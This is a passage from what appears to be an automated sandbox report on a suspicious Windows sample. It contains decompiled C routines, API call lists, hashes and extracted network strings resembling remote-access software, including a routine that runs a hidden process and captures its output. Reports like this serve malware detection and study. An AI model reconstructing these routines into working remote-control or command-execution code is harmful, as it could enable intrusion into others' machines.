					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
					if(_t7 != 0) {
						_t2 = _t7 + 0x20; // 0x20
						_t8 = _t2;
						 *((intOrPtr*)(_t7 + 4)) = 0;
						 *((intOrPtr*)(_t7 + 8)) = 0;
						_t11 = _t8 - _t7;
						do {
							 *_t8 =  *((intOrPtr*)(_t7 + 4));
							 *((intOrPtr*)(_t7 + 4)) = _t8;
							_t11 = _t11 + 0x20;
							_t8 = _t8 + 0x20;
						} while (_t11 <= 0xfe0);
						_t9 =  *0x7098f6ec; // 0x2d30000
						 *_t7 = _t9;
						 *0x7098f6ec = _t7;
						return _t7;
					}
				} else {
					while( *((intOrPtr*)(_t7 + 4)) == 0) {
						_t7 =  *_t7;
						if(_t7 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L8;
					}
				}
				L8:
				return _t7;
			}







                                                                                                        0x7098a910
                                                                                                        0x7098a91a
                                                                                                        0x7098a92b
                                                                                                        0x7098a938
                                                                                                        0x7098a940
                                                                                                        0x7098a942
                                                                                                        0x7098a942
                                                                                                        0x7098a947
                                                                                                        0x7098a94a
                                                                                                        0x7098a94d
                                                                                                        0x7098a950
                                                                                                        0x7098a953
                                                                                                        0x7098a955
                                                                                                        0x7098a958
                                                                                                        0x7098a95b
                                                                                                        0x7098a95e
                                                                                                        0x7098a966
                                                                                                        0x7098a96c
                                                                                                        0x7098a96e
                                                                                                        0x00000000
                                                                                                        0x7098a96e
                                                                                                        0x00000000
                                                                                                        0x7098a920
                                                                                                        0x7098a925
                                                                                                        0x7098a929
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098a929
                                                                                                        0x7098a920
                                                                                                        0x7098a974
                                                                                                        0x7098a974

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,7098A985,7098B968,?,?,00000001,?,?,?,?,?,70982074), ref: 7098A938
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 6af6c73c667220eb344ab180cc3989e8cf25599cf5428f5e7da4e1d809f8b7b7
                                                                                                        • Instruction ID: 4d460cb3b880df002f3f287d73feb84cdb5d9ceb182c606c17a09493168d9598
                                                                                                        • Opcode Fuzzy Hash: 6af6c73c667220eb344ab180cc3989e8cf25599cf5428f5e7da4e1d809f8b7b7
                                                                                                        • Instruction Fuzzy Hash: D8F04FB2A092208FE316CF15D854B4D7BE9AB48B00B26C1AAE04ADB3E5D370DC40CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00500C6A, Relevance: 173.3, APIs: 36, Strings: 62, Instructions: 1801COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00500C8C
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                        • _strlen.LIBCMT ref: 00500CE4
                                                                                                          • Part of subcall function 004FA79E: __EH_prolog3.LIBCMT ref: 004FA7A5
                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA7B7
                                                                                                          • Part of subcall function 004FA79E: _memset.LIBCMT ref: 004FA7DC
                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA801
                                                                                                          • Part of subcall function 004FA79E: select.WS2_32 ref: 004FA86F
                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA886
                                                                                                          • Part of subcall function 004FA79E: ioctlsocket.WS2_32(?,4004667F,?), ref: 004FA8A9
                                                                                                        • _strlen.LIBCMT ref: 00500E5E
                                                                                                        • _strlen.LIBCMT ref: 00500FE1
                                                                                                        • _strncpy.LIBCMT ref: 00501002
                                                                                                          • Part of subcall function 004FECF5: __time32.LIBCMT ref: 004FED0C
                                                                                                          • Part of subcall function 004FECF5: shutdown.WS2_32(00836C40,00000001), ref: 004FED20
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountH_prolog3Tick_strlen$CriticalSection$DeleteH_prolog3_catchInitialize__time32_memset_strncpyioctlsocketselectshutdown
                                                                                                        • String ID: $ HTTP/1$ NC.HttpInit.Failed1$ NC.HttpInit.Failed10$ NC.HttpInit.Failed2$ NC.HttpInit.Failed3$ NC.HttpInit.Failed4$ NC.HttpInit.Failed5$ NC.HttpInit.Failed7$ NC.HttpInit.Failed8$ NC.HttpInit.Failed9$ NC.HttpInit.FastPOSTMissing$ NC.HttpInit.Header $ NC.HttpInit.ReGET$ NC.HttpInit.ReGET.Replace$ NC.HttpInit.ResendPacket $ NC.HttpInit.SendBuffered.Failed$ NC.HttpInit.WrongData$ NC.HttpInit.WrongPOSTorder Exp=$ Rec=$&data=$&id=$&p=$/JAVA/$/Java/$/java/$/selftest$000$123$<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-http-request-headers-from domain="*" headers="*" /><allow-access-from domain="*" /></cross-domain-policy>$<html><body>This site is running <a href='http://www.TeamViewer.com'>TeamViewer</a>.</body></html>$?s=$?s=00000000$?s=00000000&m=fast$Cache-control: no-cache$Connection: Keep-alive$Connection: Keep-alive$Connection: close$Connection: close$Content-Length: $Content-Type: application/octet-stream$Content-Type: text/html$Content-Type: text/xml$Content-length:$Content-length: 0$Content-length: 10$Content-length: 17$GET $GET /crossdomain.xml $HTTP$HTTP/1.0 200 OK$HTTP/1.0 400 Bad Request$HTTP/1.1$HTTP/1.1 200 OK$HandleHttpInit.NoGetSession$HandleHttpInit.NoPostSession$NC.IP-Block GET-Init $POST $Tz$X-Connection: close$X-Lasterror: $fast
                                                                                                        • API String ID: 2298429837-3936837734
                                                                                                        • Opcode ID: e3e2eba16dcfb49afff496f71c30a7806c7728d6f3fa26e2a45884bd9a95ad02
                                                                                                        • Instruction ID: 126e56028416a6afb7c9dafa6e9211db950bf1ab97138c0668dce98b9ec09594
                                                                                                        • Opcode Fuzzy Hash: e3e2eba16dcfb49afff496f71c30a7806c7728d6f3fa26e2a45884bd9a95ad02
                                                                                                        • Instruction Fuzzy Hash: 7EE21670D05289AADB15EBA5C956BEE7FB8AF61304F10405EF401771D2EB781F08CB6A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FFF68, Relevance: 62.0, APIs: 18, Strings: 17, Instructions: 788sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004FFF84
                                                                                                        • GetTickCount.KERNEL32 ref: 004FFF9C
                                                                                                        • _strncmp.LIBCMT ref: 00500066
                                                                                                        • _strncmp.LIBCMT ref: 0050007C
                                                                                                        • _sprintf.LIBCMT ref: 00500141
                                                                                                        • _strlen.LIBCMT ref: 00500151
                                                                                                        • Sleep.KERNEL32(0000000A,000003E8,00000046,?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8), ref: 0050026C
                                                                                                        • GetTickCount.KERNEL32 ref: 005002CA
                                                                                                        • GetTickCount.KERNEL32 ref: 005002E3
                                                                                                        • GetTickCount.KERNEL32 ref: 005002F8
                                                                                                        • GetTickCount.KERNEL32 ref: 005003A0
                                                                                                          • Part of subcall function 004FF5A0: __EH_prolog3.LIBCMT ref: 004FF5AB
                                                                                                        • Sleep.KERNEL32(0000000A,000003E8,?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8,00000000), ref: 0050031F
                                                                                                        • _sprintf.LIBCMT ref: 00500545
                                                                                                        • _strlen.LIBCMT ref: 00500555
                                                                                                        • GetTickCount.KERNEL32 ref: 0050065A
                                                                                                        • GetTickCount.KERNEL32 ref: 005007B2
                                                                                                          • Part of subcall function 004FA4AB: shutdown.WS2_32(?,00000001), ref: 004FA5EC
                                                                                                          • Part of subcall function 004FA4AB: shutdown.WS2_32(?,00000001), ref: 004FA6CF
                                                                                                        • GetTickCount.KERNEL32 ref: 0050016D
                                                                                                          • Part of subcall function 004FA4AB: __EH_prolog3.LIBCMT ref: 004FA4B2
                                                                                                          • Part of subcall function 004FA4AB: select.WS2_32(00000002,00000000,00000001,00000000,?), ref: 004FA573
                                                                                                          • Part of subcall function 004FA4AB: __WSAFDIsSet.WS2_32(?,00000001), ref: 004FA591
                                                                                                          • Part of subcall function 004FA4AB: send.WS2_32(?,?,?,00000000), ref: 004FA5A7
                                                                                                          • Part of subcall function 004FA4AB: WSAGetLastError.WS2_32(?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8,00000000,0000000C,004DC531), ref: 004FA5B4
                                                                                                        • GetTickCount.KERNEL32 ref: 00500992
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$H_prolog3$CriticalSection$InitializeSleep_sprintf_strlen_strncmpshutdown$DeleteErrorH_prolog3_Last_swprintfselectsend
                                                                                                        • String ID: NC.Send.Timeout$<HTML>$<html>$Connection: Keep-alive$Connection: close$Connection: close$Content-Type: application/octet-stream$Content-Type: text/html$Content-Type: text/html$Content-length: %d$SendData.GETWaitingTimeout$X-Measure: 1$ncSocket.SendData.CM_HTTP_IN: SendData failed with RetCode $ncSocket.SendData.CM_HTTP_IN: writeData failed with RetCode $ncSocket.SendData.CM_HTTP_IN_JAVA: writeData failed with RetCode $ncSocket.SendData.CM_HTTP_OUT: writeDatahttp failed with RetCode $ncSocket.SendData: writeData failed with RetCode
                                                                                                        • API String ID: 3051660707-1311217405
                                                                                                        • Opcode ID: a9960147ba8763ba2fbe99d675053f1ac653d8e9f7fd250feda464e7eb43df38
                                                                                                        • Instruction ID: 4032f681d89d8ceaabb4d26aa0f75f5c8f2910d3f87b315f1203a89036f26b06
                                                                                                        • Opcode Fuzzy Hash: a9960147ba8763ba2fbe99d675053f1ac653d8e9f7fd250feda464e7eb43df38
                                                                                                        • Instruction Fuzzy Hash: 0862E070900249EFDF21EF64C896BED7BA4BF55304F04452EF85A972C2DB38AA44CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982FF0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227memoryfileprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E70982FF0(intOrPtr* _a12) {
				intOrPtr* _v4;
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				struct _STARTUPINFOW _v84;
				struct _PROCESS_INFORMATION _v100;
				void* _v108;
				void* _v112;
				WCHAR* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				WCHAR* _t52;
				int _t54;
				long _t69;
				intOrPtr _t82;
				long _t85;
				void* _t90;
				struct _OVERLAPPED* _t110;
				void* _t111;
				int _t112;
				int _t116;
				void* _t121;

				_t110 = 0;
				_v116 = 0;
				_t90 = 0;
				_v100.hThread.nLength = 0xc;
				_v100.dwProcessId = 0;
				_v100.dwThreadId = 1;
				_v112 = 0;
				_v108 = 0;
				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
					 *_a12 = 0;
					return 0;
				} else {
					_push(0x44);
					_push( &(_v84.dwX));
					L7098BF02();
					_t52 = _v116;
					_push(0x10);
					_push( &(_v100.dwProcessId));
					_v84.lpDesktop = 0x44;
					_v84.lpReserved2 = 0x101;
					_v12 = _t52;
					_v16 = _t52;
					L7098BF02();
					_t54 = CreateProcessW(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
					CloseHandle(_v124);
					if(_t54 != 0) {
						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
						_v120 = _t111;
						if(_t111 != 0) {
							_v116 = GetTickCount() + _v8 * 0x3e8;
							_v136 = 0;
							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
								while(1) {
									_t69 = _v136;
									if(_t69 == 0) {
										goto L23;
									}
									 *((char*)(_t69 + _t111)) = 0;
									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
									if(_t116 != 0) {
										_t31 = _t116 + 2; // 0x2
										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
										if(_t121 != 0) {
											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
												if(_t112 != 0) {
													_t82 = _v132 + _t112;
													_v132 = _t82;
													_push(_t82 + 1);
													if(_t90 != 0) {
														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
														if(_t85 != 0) {
															goto L12;
														} else {
															HeapFree(GetProcessHeap(), _t85, _t90);
															_t90 = 0;
															goto L14;
														}
														goto L24;
													} else {
														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
														L12:
														_t90 = _t85;
														if(_t90 != 0) {
															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
														}
													}
												}
												L14:
												_t111 = _v120;
											}
											HeapFree(GetProcessHeap(), 0, _t121);
										}
									}
									if(GetTickCount() >= _v116 || _t90 == 0) {
										_push(0);
										_push(_v100.hProcess);
										L7098BF20();
									} else {
										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
											continue;
										} else {
										}
									}
									goto L23;
								}
							}
							L23:
							HeapFree(GetProcessHeap(), 0, _t111);
						}
						L24:
						CloseHandle(_v100.hThread);
						CloseHandle(_v100);
						_t110 = _v132;
					}
					CloseHandle(_v128);
					 *_v4 = _t110;
					return _t90;
				}
			}




























                                                                                                        0x70982ff5
                                                                                                        0x70983007
                                                                                                        0x7098300b
                                                                                                        0x7098300d
                                                                                                        0x70983015
                                                                                                        0x70983019
                                                                                                        0x70983021
                                                                                                        0x70983025
                                                                                                        0x70983031
                                                                                                        0x70983293
                                                                                                        0x7098329c
                                                                                                        0x70983037
                                                                                                        0x70983039
                                                                                                        0x7098303f
                                                                                                        0x70983040
                                                                                                        0x70983045
                                                                                                        0x70983049
                                                                                                        0x7098304f
                                                                                                        0x70983050
                                                                                                        0x70983058
                                                                                                        0x70983060
                                                                                                        0x70983067
                                                                                                        0x7098306e
                                                                                                        0x70983091
                                                                                                        0x709830a4
                                                                                                        0x709830a8
                                                                                                        0x709830c2
                                                                                                        0x709830c4
                                                                                                        0x709830ca
                                                                                                        0x709830f0
                                                                                                        0x709830fa
                                                                                                        0x70983106
                                                                                                        0x70983110
                                                                                                        0x70983110
                                                                                                        0x70983116
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983120
                                                                                                        0x70983134
                                                                                                        0x70983138
                                                                                                        0x7098313e
                                                                                                        0x70983152
                                                                                                        0x70983156
                                                                                                        0x70983170
                                                                                                        0x70983189
                                                                                                        0x7098318d
                                                                                                        0x70983193
                                                                                                        0x70983195
                                                                                                        0x7098319a
                                                                                                        0x7098319d
                                                                                                        0x70983221
                                                                                                        0x70983229
                                                                                                        0x00000000
                                                                                                        0x7098322b
                                                                                                        0x70983234
                                                                                                        0x7098323a
                                                                                                        0x00000000
                                                                                                        0x7098323a
                                                                                                        0x00000000
                                                                                                        0x7098319f
                                                                                                        0x709831a8
                                                                                                        0x709831ae
                                                                                                        0x709831ae
                                                                                                        0x709831b2
                                                                                                        0x709831cb
                                                                                                        0x709831cb
                                                                                                        0x709831b2
                                                                                                        0x7098319d
                                                                                                        0x709831d1
                                                                                                        0x709831d1
                                                                                                        0x709831d1
                                                                                                        0x709831df
                                                                                                        0x709831df
                                                                                                        0x70983156
                                                                                                        0x709831ef
                                                                                                        0x70983242
                                                                                                        0x70983244
                                                                                                        0x70983245
                                                                                                        0x709831f5
                                                                                                        0x7098320f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983215
                                                                                                        0x7098320f
                                                                                                        0x00000000
                                                                                                        0x709831ef
                                                                                                        0x70983110
                                                                                                        0x7098324a
                                                                                                        0x70983254
                                                                                                        0x7098325a
                                                                                                        0x70983260
                                                                                                        0x70983265
                                                                                                        0x7098326c
                                                                                                        0x7098326e
                                                                                                        0x7098326e
                                                                                                        0x70983277
                                                                                                        0x70983282
                                                                                                        0x7098328b
                                                                                                        0x7098328b

                                                                                                        APIs
                                                                                                        • CreatePipe.KERNEL32 ref: 70983029
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 70983040
                                                                                                        • RtlZeroMemory.NTDLL ref: 7098306E
                                                                                                        • CreateProcessW.KERNEL32 ref: 70983091
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 709830A4
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709830B5
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 709830BC
                                                                                                        • GetTickCount.KERNEL32 ref: 709830D0
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 709830FE
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 7098312E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983145
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 7098314C
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 70983168
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 70983183
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831A1
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 709831A8
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 709831CB
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831D8
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 709831DF
                                                                                                        • GetTickCount.KERNEL32 ref: 709831E5
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 70983207
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 7098321A
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 70983221
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098322D
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 70983234
                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 70983245
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098324D
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 70983254
                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 70983265
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 7098326C
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 70983277
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                        • String ID: D
                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                        • Opcode ID: 4b185f0ab58becfbc59733e7e17da8be5005d7d2f501e4b8d7273768b941d06e
                                                                                                        • Instruction ID: e95f23573f159bb962ebd361bcf4747b035641c09eb5630f87b2fd3923f56b20
                                                                                                        • Opcode Fuzzy Hash: 4b185f0ab58becfbc59733e7e17da8be5005d7d2f501e4b8d7273768b941d06e
                                                                                                        • Instruction Fuzzy Hash: 7A714EB2658301ABD3109FA6CC89F5BBBECABC4B40F10492DB656D73D0D674E8049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982440, Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 167librarythreadstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E70982440() {
				short _v532;
				short _v540;
				WCHAR* _v544;
				struct _SECURITY_ATTRIBUTES* _v548;
				struct _SECURITY_ATTRIBUTES* _v552;
				struct _SECURITY_ATTRIBUTES* _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				void* _v568;
				struct HINSTANCE__* _v584;
				struct HINSTANCE__* _v588;
				struct HINSTANCE__* _v592;
				struct HINSTANCE__* _v596;
				void _v600;
				char _v604;
				char _v608;
				char _v616;
				short* _t42;
				int _t50;
				char _t51;
				WCHAR* _t53;
				short* _t54;
				void* _t58;
				intOrPtr _t64;
				void* _t67;
				long _t77;
				void* _t78;
				void* _t92;
				signed int _t95;
				void* _t96;
				void* _t98;

				_v584 = LoadLibraryW(L"user32.dll");
				_v592 = LoadLibraryW(L"shlwapi.dll");
				_v588 = LoadLibraryW(L"shell32.dll");
				_t42 = GetCommandLineW();
				_v600 = 0;
				_t92 = CommandLineToArgvW(_t42,  &_v600);
				if(_t92 == 0) {
					L24:
					FreeLibrary(_v592);
					FreeLibrary(_v600);
					FreeLibrary(_v596);
					ExitProcess(0);
				}
				if(_v608 <= 1) {
					L23:
					LocalFree(_t92);
					goto L24;
				} else {
					_t95 = 1;
					do {
						_t50 = lstrcmpiW( *(_t92 + _t95 * 4), L"-svcr");
						_t51 = _v608;
						if(_t50 != 0) {
							goto L5;
						}
						_t95 = _t95 + 1;
						if(_t95 < _t51) {
							_t53 = StrRChrW( *(_t92 + _t95 * 4), 0, 0x5c);
							if(_t53 == 0) {
								break;
							}
							_t54 =  &(_t53[1]);
							if(_t54 != 0 &&  *_t54 != 0) {
								wsprintfW( &_v540, L"%s%s",  &((StrChrW(0x7098c490, 0x2e))[1]), _t54);
								_t58 = OpenEventW(2, 0,  &_v532);
								if(_t58 != 0) {
									CloseHandle(_t58);
									break;
								}
								_t98 = CreateEventW(0, 1, 0,  &_v532);
								_t77 = 0;
								if(_t98 != 0) {
									_push(0x3c);
									_push( &_v592);
									L7098BF02();
									_v616 = 0;
									_t64 = E709822F0( *(_t92 + _t95 * 4),  &_v616);
									if(_t64 != 0) {
										_v564 = _t64;
										_v560 = _v616;
										_v556 = 0;
										_v552 = 0;
										_v548 = 0;
										_v544 =  *(_t92 + _t95 * 4);
										_t96 = CreateThread(0, 0, E709823D0,  &_v600, 0, 0);
										if(_t96 != 0) {
											_t78 = E70981D90(_v568, _v564, 0,  &_v604);
											if(_v568 != 0) {
												NtTerminateThread(_t96, 0);
												if(_t78 == 0) {
													E70981C90( &_v608);
												}
											}
											CloseHandle(_t96);
											_t77 = 0;
										}
